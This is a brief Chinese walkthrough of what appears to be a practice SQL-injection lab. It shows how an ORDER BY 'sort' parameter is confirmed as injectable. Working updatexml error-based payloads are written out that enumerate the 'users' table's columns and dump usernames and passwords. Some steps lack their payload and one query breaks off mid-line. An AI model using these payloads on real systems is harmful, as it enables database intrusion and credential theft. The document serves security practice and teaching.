如图,这一关要求我们键入一个sort值
我们分别键入sort=1/2/3/4试试,发现情况如下:
按ID升序排列
按USERNAME升序排列按PASSWORD升序排列
返回报错信息,没有第四列数据
再让ID反序排列一下试试
成功,确定是order by注入
我们在闭合单引号试试看
这里返回了完整的报错信息,我们可以知道这里是数字型注入,且我们可与考虑使用报错注入
报错注入
查看当前数据库名
查看当前数据库内表名
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+
查看users表的所有字段
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e),1)--+
得到username和password数据
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)--+
成功!